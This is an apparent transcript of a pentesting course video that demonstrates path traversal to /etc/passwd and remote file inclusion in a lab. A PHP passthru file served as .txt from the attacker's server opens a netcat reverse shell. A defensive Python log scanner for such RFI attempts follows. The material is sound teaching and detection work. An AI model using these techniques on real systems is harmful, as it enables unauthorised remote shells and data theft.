1 00:00:00,970 --> 00:00:08,050 Just like we did before in the last video, we put five times back and then we put /etc/passwd to access
2 00:00:08,050 --> 00:00:09,400 the password file.
3 00:00:09,580 --> 00:00:15,200 What we're going to do today is we're going to try to access a file located on a different server.
4 00:00:15,340 --> 00:00:21,640 So if you're doing this pentest on an actual web server, then the file that you want
5 00:00:21,640 --> 00:00:27,720 to access needs to be stored in a place with a real IP address or with a domain name.
6 00:00:27,730 --> 00:00:33,280 I'm doing this on my local server, so I'm going to store this on the web server on the Kali machine
7 00:00:33,280 --> 00:00:35,520 on 10.20.14.203.
8 00:00:35,530 --> 00:00:43,930 This is 10.20.14.204 and I'm going to store my file on 10.20.14.203, so that file, as I said,
9 00:00:43,930 --> 00:00:46,000 can be anything. It could be a web shell.
10 00:00:46,000 --> 00:00:47,910 It could be a payload.
11 00:00:47,920 --> 00:00:52,540 What I'm going to do is I'm going to create a very simple PHP file.
12 00:00:52,720 --> 00:00:56,320 So this is just the PHP start and end of the file.
13 00:00:56,530 --> 00:01:00,520 And what I'm going to put in the file: I'm going to use a function called passthru.
14 00:01:01,420 --> 00:01:04,180 And in that function, basically what this function does:
15 00:01:04,180 --> 00:01:12,190 it executes operating system commands, so it executes Windows, Linux, or, depending on the web server, it's
16 00:01:12,190 --> 00:01:19,550 going to execute commands related to that, so you put the command here between the two quotation marks,
17 00:01:19,910 --> 00:01:24,830 and I'm going to use the same command we used with the code execution vulnerability, which
18 00:01:24,830 --> 00:01:31,910 was the netcat command which allowed us to get a connection or reverse connection from our target.
19 00:01:32,270 --> 00:01:34,460 So I'm going to start here.
20 00:01:34,550 --> 00:01:36,230 So let's just first have a look at this.
21 00:01:36,230 --> 00:01:44,120 So PHP in the end, these are just the start and the end of the PHP file. passthru is a
22 00:01:44,120 --> 00:01:50,000 function that I'm going to use which executes any command that's inserted between the quotations, and
23 00:01:50,000 --> 00:01:56,000 I'm using the same command that we used in the command execution vulnerability, which will just do a
24 00:01:56,000 --> 00:01:59,310 reverse connection to my computer.
25 00:01:59,320 --> 00:02:00,220 So this is all good.
26 00:02:00,220 --> 00:02:02,690 Now the next step is the most important step.
27 00:02:02,860 --> 00:02:04,570 And it's storing this file.
28 00:02:04,570 --> 00:02:12,410 So as I said, if your target was a remote web server, then you should be storing this file in a place
29 00:02:12,590 --> 00:02:16,910 with a real IP where you can access it from the remote web server.
30 00:02:16,910 --> 00:02:22,670 Now I'm going to be trying to access this from my Metasploitable machine, which is able to access
31 00:02:22,670 --> 00:02:27,950 files stored on the Kali machine because they're both on the same network, and I'm going to be calling
32 00:02:27,950 --> 00:02:31,930 this, I'm gonna be storing it in my /var/www/html.
33 00:02:32,000 --> 00:02:32,690 So it's storing.
34 00:02:32,780 --> 00:02:36,160 It's being stored on the Kali, not on the Metasploitable.
35 00:02:36,170 --> 00:02:45,710 And I'm gonna call it reverse and I'm gonna save it as .txt, not .php, and I'm doing this because if I stored it as
36 00:02:45,710 --> 00:02:50,280 a .php it is going to be executed on the Kali machine.
37 00:02:50,300 --> 00:02:54,730 So it's going to create a reverse connection from the Kali machine, and I don't want that.
38 00:02:54,740 --> 00:02:59,180 I don't want to hack the Kali machine, I actually already have access to the Kali machine; the one
39 00:02:59,180 --> 00:03:04,770 that I want to hack is the Metasploitable machine, and that one is stored remotely.
40 00:03:04,850 --> 00:03:12,590 So in order to be able to include the PHP code and execute it on the remote machine, we're gonna use
41 00:03:12,590 --> 00:03:19,220 it as .txt and get it executed on the Metasploitable machine instead of executed on my Kali.
42 00:03:19,790 --> 00:03:26,820 So I'm storing it as a .txt and I'm going to save it, and now let's just see here, so if I go
43 00:03:26,820 --> 00:03:36,900 to my localhost and if I say reverse.txt, we'll see our file right here.
44 00:03:36,910 --> 00:03:42,310 So again, this is on my localhost, which is not the Metasploitable machine.
45 00:03:42,310 --> 00:03:49,990 It's 10.20.14.203 and the Metasploitable is on .204.
46 00:03:50,040 --> 00:03:55,530 So how are we going to run this? First let me just listen for connections like we did before.
47 00:03:55,590 --> 00:03:58,830 So it's just going to be netcat,
48 00:03:58,990 --> 00:04:10,430 nc -vv -l -p 8080, and then right here, instead of including a file on the same server, I'm going to include
49 00:04:10,430 --> 00:04:14,480 a remote file, and the command is going to be http.
50 00:04:14,510 --> 00:04:21,950 So it's just going to be the link to this file, so we can access the file here as .txt; gonna copy it and
51 00:04:21,950 --> 00:04:22,780 paste it here,
52 00:04:27,420 --> 00:04:33,600 and also in some cases you might need to add a question mark to the end to get this file to be executed
53 00:04:33,650 --> 00:04:34,550 as PHP.
54 00:04:35,280 --> 00:04:40,950 So I'm just gonna go over this again one more time: including a remote file which is on a remote
55 00:04:40,950 --> 00:04:41,600 server.
56 00:04:41,700 --> 00:04:48,840 Make sure the remote server is accessible by your target, and also make sure you store it as .txt, because
57 00:04:48,840 --> 00:04:54,840 if you keep it as .php, this file, the reverse file, will be executed on the remote server, so it will be
58 00:04:54,840 --> 00:04:58,850 executed on the .203 instead of being executed on the .204.
59 00:04:59,610 --> 00:05:01,270 And I'm keeping it as .txt.
60 00:05:01,350 --> 00:05:02,790 This way it'll be great.
61 00:05:02,850 --> 00:05:09,030 It's gonna be executed on the .204 and it's gonna give me a remote connection to this computer,
62 00:05:09,650 --> 00:05:11,880 to the Metasploitable computer.
63 00:05:12,150 --> 00:05:15,840 So if I come back here, as you can see, we have a remote connection.
64 00:05:15,840 --> 00:05:23,100 If we do a uname -a, you'll see that this is the Metasploitable machine, not the Kali machine.
65 00:05:23,100 --> 00:05:29,370 So we basically have full access to the Metasploitable machine through a remote file inclusion
66 00:05:29,370 --> 00:05:30,510 vulnerability.
67 00:05:30,510 --> 00:05:36,960 Now if we do an ls, we can do a pwd to see where we are, and we can literally run any
68 00:05:36,960 --> 00:05:37,740 command we want.
69 00:05:37,740 --> 00:05:40,260 Now on the machine, and do anything we want.
70 00:05:40,260 --> 00:05:42,450 Basically we have full access to that machine.
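The request the video sends has a recognisable shape in the target's web server logs: an include-style parameter whose value is a full URL to a non-.php file, often with a trailing question mark. The following detection script is an added example and is not part of the course or its lab setup. It scans constructed combined-format access-log lines for that pattern; the parameter names, the scheme list, the 192.0.2.x addresses and the hostnames are all assumptions made for the example, and the second-round percent-decoding is a heuristic, not a standard.

```python
"""Flag remote-file-inclusion (RFI) attempts in combined-format web access logs.

Added detection example, not from the course video. Heuristics (parameter names,
schemes, decoding rounds) are assumptions chosen for illustration.
"""
import re
from typing import Optional
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample log lines (combined log format). Addresses from the
# 192.0.2.0/24 documentation range and the hostnames are made up.
SAMPLE_LOG = """\
192.0.2.20 - - [01/Jan/2024:10:00:01 +0000] "GET /dvwa/vulnerabilities/fi/?page=include.php HTTP/1.1" 200 1532
192.0.2.20 - - [01/Jan/2024:10:00:05 +0000] "GET /dvwa/vulnerabilities/fi/?page=http://192.0.2.10/reverse.txt? HTTP/1.1" 200 0
192.0.2.20 - - [01/Jan/2024:10:00:09 +0000] "GET /dvwa/vulnerabilities/fi/?page=hTTp%3A%2F%2Fevil.example%2Fshell.txt%3F HTTP/1.1" 200 0
192.0.2.20 - - [01/Jan/2024:10:00:12 +0000] "GET /dvwa/vulnerabilities/fi/?page=../../../../etc/passwd HTTP/1.1" 200 2048
192.0.2.20 - - [01/Jan/2024:10:00:15 +0000] "GET /about?ref=https://partner.example/page HTTP/1.1" 200 900
"""

# Parameter names commonly handed to include()/require(); assumed watch-list.
INCLUDE_PARAMS = {"page", "file", "include", "path", "template", "module"}

# Schemes PHP can open through allow_url_include / stream wrappers; assumed list.
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps", "php", "data", "expect"}

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.\-]*)://", re.IGNORECASE)


def decode_param(value: str, rounds: int = 2) -> str:
    """Percent-decode up to `rounds` times so simple double encoding is caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_value(value: str) -> Optional[dict]:
    """Return finding details if the value looks like a remote include, else None."""
    decoded = decode_param(value).strip()
    match = SCHEME_RE.match(decoded)
    if not match:
        return None
    scheme = match.group(1).lower()
    if scheme not in REMOTE_SCHEMES:
        return None
    return {
        "scheme": scheme,
        "url": decoded,
        # A trailing '?' turns whatever the vulnerable script appends (such as
        # a ".php" suffix) into a query string of the remote URL.
        "trailing_query_trick": decoded.endswith("?"),
        # Serving the payload as .txt keeps the attacker's own server from
        # executing it; the target's PHP interpreter runs the fetched text.
        "non_php_extension": not urlsplit(decoded).path.lower().endswith(".php"),
    }


def scan_line(line: str) -> list:
    """Return a list of RFI findings for one access-log line (empty if clean)."""
    findings = []
    match = REQUEST_RE.search(line)
    if not match:
        return findings
    # urlsplit on a path-only target leaves scheme empty; query is after '?'.
    query = urlsplit(match.group("target")).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() not in INCLUDE_PARAMS:
            continue  # e.g. ref=https://... on a benign page is not an include
        detail = classify_value(value)
        if detail:
            detail["param"] = name
            detail["client"] = line.split(" ", 1)[0]
            findings.append(detail)
    return findings


def scan_log(text: str) -> list:
    """Scan every line of a log and collect findings."""
    results = []
    for line in text.splitlines():
        results.extend(scan_line(line))
    return results


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['client']} RFI via {finding['param']}={finding['url']} "
              f"(trailing '?': {finding['trailing_query_trick']}, "
              f"non-.php: {finding['non_php_extension']})")
```

The allow-list of parameter names is what keeps the benign `ref=https://...` request out of the results; on a real site you would seed it from the application's own include parameters. The two boolean flags record the exact tricks the video relies on (the `.txt` extension and the trailing question mark), which makes the finding easier to triage than a bare "URL in parameter" alert.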